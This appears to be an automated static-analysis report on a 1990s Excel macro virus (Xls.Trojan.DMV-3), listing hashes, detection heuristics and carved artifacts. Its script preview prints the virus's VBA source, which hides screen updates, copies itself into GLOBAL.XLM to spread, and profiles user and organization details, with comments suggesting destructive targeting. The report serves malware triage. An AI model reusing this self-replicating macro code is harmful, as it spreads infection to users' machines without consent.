Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 067ff9f2bdc6dbcd…

MALICIOUS

Office (OLE)

93.5 KB Created: 1997-11-05 01:29:32 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 5f7b166550b0c6440d73e6af1b9cb7af SHA-1: 554d15e37910f596af70532c7286004eb9a91ddb SHA-256: 067ff9f2bdc6dbcdb60b154f9f66927d78b10e85c37a50b59d81f4f528350e83
302 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Xls.Trojan.DMV-3. It contains VBA macros, specifically an Auto_Close macro designed to execute when the Excel workbook is closed. This macro attempts to propagate itself by infecting the GLOBAL.XLM file, which is a common technique for spreading malware within older Excel versions. The VBA code explicitly mentions infecting GLOBAL.XLM and uses the module name 'Sheet01' for the injected virus code.

Heuristics 7

  • ClamAV: Xls.Trojan.DMV-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.DMV-3
  • Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 84,184 bytes but its declared streams total only 0 bytes — 84,184 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMS
    The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.
  • Unsupported Office format for VBA extraction info OFFICE_FORMAT_UNSUPPORTED
    olevba could not extract VBA macros (AttributeError); format-agnostic byte-level scans still ran. Likely legacy, encrypted, or malformed OLE/OOXML — re-scanning the same bytes will yield the same outcome.

Extracted artifacts 5

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8748 bytes
SHA-256: 3a85641992aa6cc565b416c9ad4275a30d7d5948d7a111de7442992a75230136
Detection
ClamAV: Xls.Trojan.DMV-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet01"

' Excel Auto_Close DMV
' 12/27/94 by joelm@eskimo.com
'
' This is a quick and dirty demonstration of a DMV running under
' Microsoft Excel 5.0.  It demonstrates the security risks of
' automatic macros.
'
' The code executes when Excel closes.  It infects the global macro file.
' No data files are infected, although it would be possible to add
' additional VBA code to do so (ala the Word DMV.DOC file).

Sub Auto_Close()
Attribute Auto_Close.VB_Description = "Macro recorded 12/27/94 by joelm"
Attribute Auto_Close.VB_ProcData.VB_Invoke_Func = " \n0"

'this is the virus propogation code that infects global.xlm

'for testing if global.xlm and virus are already present
globalPresent = 0
virusPresent = 0

'turn screen updating off so the results can't be seen by the user
Application.ScreenUpdating = False
For x = 1 To Application.Workbooks.Count
    'is a global.xlm file present?
    If Application.Workbooks(x).Name = "GLOBAL.XLM" Then
        'it exists
        globalPresent = 1
        'now see if the macro virus has already been installed
        For y = 1 To Application.Workbooks("GLOBAL.XLM").Modules.Count
            'the module with the virus is given an innocent looking
            'name that blends in with the other sheets
            If Application.Workbooks("GLOBAL.XLM").Modules(y).Name = "Sheet01" Then
                virusPresent = 1
                MsgBox "Virus already installed in GLOBAL.XLM"
            End If
        Next
        
        'global.xlm exists, but the virus hasn't been installed, so install
        'it from this file
        If virusPresent = 0 Then
            'make it visible - this is required before a copy
            Windows("GLOBAL.XLM").Visible = True
            'copy this module into it
            MsgBox "GLOBAL.XLM exists.  Adding Auto_Close virus to it."
            Application.Workbooks("DMV.XLS").Modules("Sheet01").Copy after:=Application.Workbooks("GLOBAL.XLM").Modules(1)
            'make it invisible again
            Windows("GLOBAL.XLM").Visible = False
            'save it
            Application.Workbooks("GLOBAL.XLM").Save
        End If
    End If
Next
    'global.xlm doesn't exist, so create one and save macro to
    If globalPresent = 0 Then
        MsgBox "GLOBAL.XLM doesn't exist.  Creating it now."
        'copy the module into the startup directory
        Application.Workbooks("DMV.XLS").SaveCopyAs Application.StartupPath + "\GLOBAL.XLM"
        'now we need to open it up and make it visible
        Application.Workbooks.Open (Application.StartupPath + "\GLOBAL.XLM")
        Windows("GLOBAL.XLM").Visible = False
        'save the change
        Application.Workbooks("GLOBAL.XLM").Save
    End If
    
'turn screen updating back on
Application.ScreenUpdating = True
    
MsgBox "The virus has been spread.  Now execute some other code, for example..."

'this is the code that executes after the virus is spread, some malicious
'examples that use simple VB properties are shown

orgName = Application.OrganizationName
MsgBox ("Just checked which organization Excel was registered to..." + Chr(10) + Chr(10) + "A DMV could selectively target a business, government agency, or organization.  For example, delete all files if this software was licensed to IBM.")

useName = Application.UserName
MsgBox "Just checked who Excel was registered to..." + Chr(10) + Chr(10) + "A DMV could selectively target a specific individual for revenge or eavesdropping."

theCountry = Application.International(xlCountryCode)
MsgBox "Just checked Excel's country code..." + Chr(10) + Chr(10) + "A DMV could selectively target users within a certain country.  For example, overwrite files if an Arabic version of Excel was running."

theDate = Date
MsgBox "Just checked the date..." + Chr(10) + Chr(10) + "A DMV could serve as a time bomb.  For example, start renaming files after September 1995, so it appears problems are related to the release of Microsoft Windows 95."

theOS = Application.Op
... (truncated)
embedded_office_off00002d28.ole embedded-office Embedded OLE/CFB Office body inside ole container at offset 0x2D28 84184 bytes
SHA-256: 2b4d80d39c0383d55ecb34c7e48d769ec7b2b32ca3fa96cd0fd7d746739e8cf7
embedded_office_off00004e7d.ole embedded-office Embedded OLE/CFB Office body inside ole container at offset 0x4E7D 75651 bytes
SHA-256: ee13cfcc8dfda0703b02523df20e115016019da2d9cd091bc687ee2e89199452
embedded_office_off00005088.ole embedded-office Embedded OLE/CFB Office body inside ole container at offset 0x5088 75128 bytes
SHA-256: 352dc36a35a00746b18564532dd02c670518885d378ad8ff195dea8cb7479bef
embedded_office_off0000512d.ole embedded-office Embedded OLE/CFB Office body inside ole container at offset 0x512D 74963 bytes
SHA-256: a04f7e192998f18047de1d9c2715e99182d71d9127f505bc87fb9adada1ac822

Open this report in the interactive analyzer, or submit your own file for analysis.